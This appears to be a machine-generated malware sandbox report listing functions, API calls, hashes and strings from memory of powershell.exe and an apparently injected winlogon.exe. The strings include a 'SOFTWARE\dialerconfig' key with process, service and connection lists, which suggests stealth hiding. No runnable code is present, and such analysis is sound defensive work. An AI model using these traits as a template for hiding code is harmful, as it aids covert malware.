Snapshot File: hcaresult_5_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b155f32fda11d84c03b8ecf693ed0fc1a1f9728e5a24d38fe5f793f4d0d452
Instruction ID: b96a2d027ae49eed640e44c9572e44d0f3aad0ea84af097d64f72fb7a20327ae
Opcode Fuzzy Hash: 71b155f32fda11d84c03b8ecf693ed0fc1a1f9728e5a24d38fe5f793f4d0d452
Instruction Fuzzy Hash: AC31087191CB8C4FDB58DB5C984A6A97BF0FB59320F00426FE449C3262DA74A855CBC2

Function 00007FFD9B6DE620 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1822515941.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b6dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442ab0fd5210f9a78c8c02e953f50c5b3bca7686b022c79d23285417d2f2a7a6
Instruction ID: c62613f5e8c42c3cb0db99ea8f80be8038f534f0f0287507d54a5c632e5f350e
Opcode Fuzzy Hash: 442ab0fd5210f9a78c8c02e953f50c5b3bca7686b022c79d23285417d2f2a7a6
Instruction Fuzzy Hash: 1A41077140EBC44FE7569B29DC559523FF0EF56320B1A06EFD088CB1A3D625B845C7A2

Function 00007FFD9B7FB028 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1823394258.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dd4a908d81d362c04ff6f943c3b6811aafba19051eac1f8b9e5cd3f0a5ad128
Instruction ID: 46c910354665ff34bb61b33c3910ac33c793ec6eca69e46389a86d7f5f880e55
Opcode Fuzzy Hash: 8dd4a908d81d362c04ff6f943c3b6811aafba19051eac1f8b9e5cd3f0a5ad128
Instruction Fuzzy Hash: 1521F631A0CB4C4FDB59DFAC984A7E97FE0EB96321F04426BD458C3162DA74A41ACB91

Function 00007FFD9B7F4675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1823394258.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
Instruction ID: 06e1d6d280ca6f07a48e3bc6528028b9f359947669cfabeae758b7bcff46287b
Opcode Fuzzy Hash: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
Instruction Fuzzy Hash: 7F01A77020CB0C8FD748EF4CE051AA5B7E0FF85360F10056EE58AC36A1D632E881CB45

Function 00007FFD9B7FAE68 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1823394258.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef97e784b982a14a57f2481b5cf2f21379d534dd1c8b4b7d555235d18d5670fc
Instruction ID: 0db15ed6befc4636bd34bdc8c8d65b7e00f9c9105fbfc382a33f298f47b07a3f
Opcode Fuzzy Hash: ef97e784b982a14a57f2481b5cf2f21379d534dd1c8b4b7d555235d18d5670fc
Instruction Fuzzy Hash: E4F0B43191868D8FDB06DF6488559D57FA0FF26210B050297E45CC71B2DB34A558CB92

Function 00007FFD9B8C4A1D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1824184472.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 233be2d6ec139d47a07dc50e82d573d335bd1ab357559d4eb64bad50099a59d9
Instruction ID: 688a9639d6a086f8a8ae0ee6500ab442f72b901ee5f08059f0b414868250b4df
Opcode Fuzzy Hash: 233be2d6ec139d47a07dc50e82d573d335bd1ab357559d4eb64bad50099a59d9
Instruction Fuzzy Hash: F8F05E32B0E9498FDB68EB5CE4518A873E1EF4932171500BBE16DC75B7DA25EC81C744

Function 00007FFD9B8C53E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1824184472.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d00a29d9910a15a14c80db149be710741d8f019ca137cd7de941694c5587005
Instruction ID: 5d7d26bd8fb23ad6ea7c2eaa69419330f9567cbd3fa1c69248cd66a061b9ff75
Opcode Fuzzy Hash: 1d00a29d9910a15a14c80db149be710741d8f019ca137cd7de941694c5587005
Instruction Fuzzy Hash: EEF0A73131CF044FD744EE1DD445AA5B3D0FBA8310F10452FE44AC3651DA21E4818782

Function 00007FFD9B8C4CD0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1824184472.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 472d27d4eb1483968c272832bc2c94dedd319b33974fbac45d3ee383f483713d
Instruction ID: 4dea82a5a088f5c6e024354bfe514fa65b4aab1037bf0903a94ca817e18fbd63
Opcode Fuzzy Hash: 472d27d4eb1483968c272832bc2c94dedd319b33974fbac45d3ee383f483713d
Instruction Fuzzy Hash: ACF05E72B0E5498FEB68FB5CE4518A877E0EF4932171500BBE15ECB4B3DA26AC80C740

Analysis Process: winlogon.exePID: 552, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	94.3%
Signature Coverage:	0%
Total number of Nodes:	106
Total number of Limit Nodes:	17

Executed Functions

Function 00000225DC641650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC64165B
HeapAlloc.KERNEL32 ref: 00000225DC64166A

Part of subcall function 00000225DC641274: GetProcessHeap.KERNEL32 ref: 00000225DC64127A
Part of subcall function 00000225DC641274: HeapAlloc.KERNEL32 ref: 00000225DC641289
Part of subcall function 00000225DC641274: GetProcessHeap.KERNEL32 ref: 00000225DC6412A3
Part of subcall function 00000225DC641274: HeapAlloc.KERNEL32 ref: 00000225DC6412B4

RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DA
RegOpenKeyExW.ADVAPI32 ref: 00000225DC641707
RegCloseKey.ADVAPI32 ref: 00000225DC641721
RegOpenKeyExW.ADVAPI32 ref: 00000225DC641741
RegCloseKey.ADVAPI32 ref: 00000225DC64175C
RegOpenKeyExW.ADVAPI32 ref: 00000225DC64177C
RegCloseKey.ADVAPI32 ref: 00000225DC641797
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417B7
RegCloseKey.ADVAPI32 ref: 00000225DC6417D2
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417F2
RegCloseKey.ADVAPI32 ref: 00000225DC64180D
RegOpenKeyExW.ADVAPI32 ref: 00000225DC64182D
RegCloseKey.ADVAPI32 ref: 00000225DC641848
RegOpenKeyExW.ADVAPI32 ref: 00000225DC641868
RegCloseKey.ADVAPI32 ref: 00000225DC641883
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6418A3
RegCloseKey.ADVAPI32 ref: 00000225DC6418BE
RegCloseKey.ADVAPI32 ref: 00000225DC6418C8

Part of subcall function 00000225DC6412C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000225DC641326
Part of subcall function 00000225DC6412C8: GetProcessHeap.KERNEL32 ref: 00000225DC641334
Part of subcall function 00000225DC6412C8: HeapAlloc.KERNEL32 ref: 00000225DC641345
Part of subcall function 00000225DC6412C8: RegEnumValueW.ADVAPI32 ref: 00000225DC6413A1
Part of subcall function 00000225DC6412C8: GetProcessHeap.KERNEL32 ref: 00000225DC6413E9
Part of subcall function 00000225DC6412C8: HeapAlloc.KERNEL32 ref: 00000225DC6413F7
Part of subcall function 00000225DC6412C8: GetProcessHeap.KERNEL32 ref: 00000225DC64141B
Part of subcall function 00000225DC6412C8: HeapFree.KERNEL32 ref: 00000225DC641429
Part of subcall function 00000225DC6412C8: lstrlenW.KERNEL32 ref: 00000225DC641432
Part of subcall function 00000225DC6412C8: GetProcessHeap.KERNEL32 ref: 00000225DC641440
Part of subcall function 00000225DC6412C8: HeapAlloc.KERNEL32 ref: 00000225DC64144E

Strings

service_names, xrefs: 00000225DC6417EB
pid, xrefs: 00000225DC64173A
startup, xrefs: 00000225DC6416FD
SOFTWARE\dialerconfig, xrefs: 00000225DC6416BA
process_names, xrefs: 00000225DC641775
tcp_remote, xrefs: 00000225DC641861
udp, xrefs: 00000225DC64189C
paths, xrefs: 00000225DC6417B0
tcp_local, xrefs: 00000225DC641826

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 84d0a864ffcbc837ecc7354a3d772abf192ae96d0213883569f1f6ea5f421f72
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 18711F3A324F60A6EB109FA9E85869D37B4F784F8AF509521DE4E57B69EF38C445C300

Function 00000225DC645C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00000225DC645C4B
GetThreadContext.KERNEL32 ref: 00000225DC645DB5

Part of subcall function 00000225DC645A40: GetCurrentThreadId.KERNEL32 ref: 00000225DC645A44

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
Instruction ID: 944e82db3403cf074b4c20140e3f4fe526249a22eecae15d0e28de081167e2ad
Opcode Fuzzy Hash: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
Instruction Fuzzy Hash: A8D19A7A20CF9892DA70DB5AE49835A77A0F7C8B85F104256EACE47BA5DF3CC541CB00

Function 00000225DC6451B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00000225DC645236

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
Instruction ID: db88e7363c8c6d67948adb73f6fa9911972c13677c94ce65f9111591e5b650f5
Opcode Fuzzy Hash: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
Instruction Fuzzy Hash: 0002D93A21DB9496E760CB99E49435AB7A1F3C5B85F104155EB8E87BA8EF7CC484CF00

Function 00000225DC643878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00000225DC643886
GetCurrentProcess.KERNEL32 ref: 00000225DC6438B4
VirtualProtectEx.KERNEL32 ref: 00000225DC6438D6
GetCurrentProcess.KERNEL32 ref: 00000225DC6438F4
VirtualProtectEx.KERNEL32 ref: 00000225DC643915

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: ebfbda4d6f83f092f5b40694f6fedf07c780684687202726d78380dbc3561c7a
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 7D113C2A718F54A3EB149BA9F40866AB6A0F748F85F148439DE8A07794EF3DC504C700

Function 00000225DC643AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00000225DC643B46
VirtualAlloc.KERNEL32 ref: 00000225DC643B80

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: a5174926809f1d8a058b45505692cd786dcb26961728ddb02e83bed768d52ab0
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 5D31102621DE98A1EA30DB9DE05835A72A0F398B85F108575F5CF46BA8DF7DC580CB00

Function 00000225DC643458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000225DC64347A
PathFindFileNameW.SHLWAPI ref: 00000225DC643489

Part of subcall function 00000225DC643930: StrCmpNIW.SHLWAPI ref: 00000225DC643948

Part of subcall function 00000225DC643878: GetModuleHandleW.KERNEL32 ref: 00000225DC643886
Part of subcall function 00000225DC643878: GetCurrentProcess.KERNEL32 ref: 00000225DC6438B4
Part of subcall function 00000225DC643878: VirtualProtectEx.KERNEL32 ref: 00000225DC6438D6
Part of subcall function 00000225DC643878: GetCurrentProcess.KERNEL32 ref: 00000225DC6438F4
Part of subcall function 00000225DC643878: VirtualProtectEx.KERNEL32 ref: 00000225DC643915

CreateThread.KERNEL32 ref: 00000225DC6434D7

Part of subcall function 00000225DC641EB4: GetCurrentThread.KERNEL32 ref: 00000225DC641EBF

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: f74e7b676ed9400ac381515b8e9436b1a81361eff809a806e376a47053f7f487
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 32115B7862CF39B2FB21EBEDA80E7993291AB54B07F54C4759A1785194EF3DC044C210

Function 00000225DC644ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00000225DC644ED4
VirtualProtect.KERNEL32 ref: 00000225DC644F17
FlushInstructionCache.KERNEL32 ref: 00000225DC644F2C

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
Instruction ID: 478e726ee42b9ad2565bb85821ddd20a54e3ccf57beded389c022ecaab978b6a
Opcode Fuzzy Hash: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
Instruction Fuzzy Hash: 61F0D06A21CF54D1D630DB49E45575A77A0E3CC7D5F148155F98E07BA9CE39C181CF00

Function 00000225DC612908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000225DC6129AA
LoadLibraryA.KERNELBASE ref: 00000225DC612A31

Memory Dump Source

Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 084b2b25044c8794af9290a18b9c690fa1b2fa5669142dee8622e2e675240a44
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 0C61253A702A6297EF69CF9DD44876DB3D1FB04B9AF14C021DA1907785DB38E952C700

Function 00000225DC641C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000225DC641650: GetProcessHeap.KERNEL32 ref: 00000225DC64165B
Part of subcall function 00000225DC641650: HeapAlloc.KERNEL32 ref: 00000225DC64166A
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DA
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641707
Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641721
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641741
Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC64175C
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64177C
Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641797
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417B7
Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6417D2
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417F2

Sleep.KERNEL32 ref: 00000225DC641C43
SleepEx.KERNELBASE ref: 00000225DC641C49

Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC64180D
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64182D
Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641848
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641868
Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC641883
Part of subcall function 00000225DC641650: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6418A3
Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6418BE
Part of subcall function 00000225DC641650: RegCloseKey.ADVAPI32 ref: 00000225DC6418C8

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 9e56ec6e1a2bb83d4d1e20ad845025165e388ca77e262dcd1bfd0d10c7f0d1f5
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: B53101AD21CE21B1FF549FBED94935A37E4AB44BCAF14D0A1DE0B87696EE34C850C250

Function 00000225DC672908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000225DC6729AA

Memory Dump Source

Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 4b28b13bbc6e47e71a7054b23a38bb8b44a856d0b11ab48412ece4213b3be521
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: D961222A701A62D3EE69CFA9D44876CB391FB04B99F14C821DA1907BC5DB38E852C700

Function 00000225DC6AB860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 00000225DC6AB8B5

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: cc9918f6b3098a29d4ae8dc7f61338113fbc7ed24898dabb4ac6ceb7f2f2d2e0
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 1DF01DAC701E25A1FE59EBEE945939512856FC5B42F6CD934CD0AC63D2DE3CC485C210

Non-executed Functions

Function 00000225DC642CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00000225DC642D80
lstrlenW.KERNEL32 ref: 00000225DC642FBA

Part of subcall function 00000225DC641A14: OpenProcess.KERNEL32 ref: 00000225DC641A3A
Part of subcall function 00000225DC641A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000225DC641A58
Part of subcall function 00000225DC641A14: PathFindFileNameW.SHLWAPI ref: 00000225DC641A67
Part of subcall function 00000225DC641A14: lstrlenW.KERNEL32 ref: 00000225DC641A73
Part of subcall function 00000225DC641A14: StrCpyW.SHLWAPI ref: 00000225DC641A86
Part of subcall function 00000225DC641A14: CloseHandle.KERNEL32 ref: 00000225DC641A94

GetProcAddress.KERNEL32 ref: 00000225DC642D95

Part of subcall function 00000225DC641554: StrCmpIW.SHLWAPI ref: 00000225DC641585

Part of subcall function 00000225DC643930: StrCmpNIW.SHLWAPI ref: 00000225DC643948

StrCmpNIW.SHLWAPI ref: 00000225DC642DD8
lstrlenW.KERNEL32 ref: 00000225DC642F00

Strings

NtQueryObject, xrefs: 00000225DC642D8B
ntdll.dll, xrefs: 00000225DC642D79
\Device\Nsi, xrefs: 00000225DC642DCB

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 13e21aab0bda9cc4e5bc9a85af016e9a731f36370949422a27c399fe7f801b24
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 1FB1A16A22CE74A1EBA58FADC4487A973A4FB44F86F649066EE0A53794DF35CC41C340

Function 00000225DC6A2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00000225DC6A2D80
lstrlenW.KERNEL32 ref: 00000225DC6A2FBA

Part of subcall function 00000225DC6A1A14: OpenProcess.KERNEL32 ref: 00000225DC6A1A3A
Part of subcall function 00000225DC6A1A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000225DC6A1A58
Part of subcall function 00000225DC6A1A14: PathFindFileNameW.SHLWAPI ref: 00000225DC6A1A67
Part of subcall function 00000225DC6A1A14: lstrlenW.KERNEL32 ref: 00000225DC6A1A73
Part of subcall function 00000225DC6A1A14: StrCpyW.SHLWAPI ref: 00000225DC6A1A86
Part of subcall function 00000225DC6A1A14: CloseHandle.KERNEL32 ref: 00000225DC6A1A94

GetProcAddress.KERNEL32 ref: 00000225DC6A2D95

Part of subcall function 00000225DC6A1554: StrCmpIW.SHLWAPI ref: 00000225DC6A1585

Part of subcall function 00000225DC6A3930: StrCmpNIW.SHLWAPI ref: 00000225DC6A3948

StrCmpNIW.SHLWAPI ref: 00000225DC6A2DD8
lstrlenW.KERNEL32 ref: 00000225DC6A2F00

Strings

ntdll.dll, xrefs: 00000225DC6A2D79
NtQueryObject, xrefs: 00000225DC6A2D8B
\Device\Nsi, xrefs: 00000225DC6A2DCB

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 49891a77d833b8966d7278af0461f95e2a538990b23d8f8f70f933d8b27bc86b
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 5FB1B17A250E60A1EB69CFADD4487A9A3A5FB44B86F64D026EE0D93794DF35CC81C340

Function 00000225DC647E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000225DC647E8C
RtlCaptureContext.NTDLL ref: 00000225DC647EB9
RtlLookupFunctionEntry.NTDLL ref: 00000225DC647ED3
RtlVirtualUnwind.NTDLL ref: 00000225DC647F14
IsDebuggerPresent.KERNEL32 ref: 00000225DC647F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000225DC647F89
UnhandledExceptionFilter.KERNEL32 ref: 00000225DC647F94

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 74af288e059d5c8d23f4d410f0be3976c1ac1cdc9bcb8f1d8e07bdf2c6108118
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 0C318376219F90A6EB60DFA4E8447ED7360F784B45F44852ADB4E47B98EF38C648CB10

Function 00000225DC6A7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

